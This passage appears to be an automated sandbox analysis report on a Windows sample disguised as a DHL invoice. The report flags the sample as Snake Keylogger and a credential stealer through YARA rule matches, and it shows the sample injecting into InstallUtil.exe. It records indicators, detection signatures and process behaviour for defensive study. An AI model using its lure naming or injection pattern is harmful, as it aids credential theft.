              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9FA684_2_05D9FA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9F6104_2_05D9F610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9F6004_2_05D9F600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9C6384_2_05D9C638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC91E04_2_05DC91E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC11A04_2_05DC11A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCB1604_2_05DCB160
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC79104_2_05DC7910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCDD294_2_05DCDD29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCA4C04_2_05DCA4C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCC4484_2_05DCC448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC98304_2_05DC9830
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCB7B04_2_05DCB7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCAB104_2_05DCAB10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC7EFF4_2_05DC7EFF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC9E784_2_05DC9E78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCBE004_2_05DCBE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC91CF4_2_05DC91CF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCBDFB4_2_05DCBDFB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC11914_2_05DC1191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC5D914_2_05DC5D91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC5DA04_2_05DC5DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCB1504_2_05DCB150
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC59484_2_05DC5948
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC0D484_2_05DC0D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC79004_2_05DC7900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC29004_2_05DC2900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC59384_2_05DC5938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC0D394_2_05DC0D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC08F04_2_05DC08F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC54F04_2_05DC54F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC08E04_2_05DC08E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC54E14_2_05DC54E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC50984_2_05DC5098
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC04984_2_05DC0498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC04884_2_05DC0488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC508B4_2_05DC508B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC74B84_2_05DC74B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCA4B04_2_05DCA4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC74A84_2_05DC74A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC70544_2_05DC7054
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC4C404_2_05DC4C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC00404_2_05DC0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC70604_2_05DC7060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC6C084_2_05DC6C08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC00074_2_05DC0007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCC4384_2_05DCC438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC4C304_2_05DC4C30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC98204_2_05DC9820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC47DB4_2_05DC47DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC6BF84_2_05DC6BF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC47E84_2_05DC47E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC67B04_2_05DC67B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC67A04_2_05DC67A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCB7A04_2_05DCB7A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC7F584_2_05DC7F58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC43584_2_05DC4358
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC43684_2_05DC4368
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DCAB034_2_05DCAB03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC9E674_2_05DC9E67
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC62104_2_05DC6210
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC36004_2_05DC3600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05DC62204_2_05DC6220
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeBinary or memory string: OriginalFilename vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050412562.0000000005D80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDspdsurwj.dll" vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.000000000253F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2035150985.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.00000000023B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000000.1681633639.0000000000084000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMizMhanageSetup.exej% vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeBinary or memory string: OriginalFilenameMizMhanageSetup.exej% vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Gbiuhzoprp.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, -t-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, -t-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@3/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002646000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002655000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeVirustotal: Detection: 26%
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeReversingLabs: Detection: 26%
              Source: unknownProcess created: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe "C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe"
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: wldp.dllJump to behavior
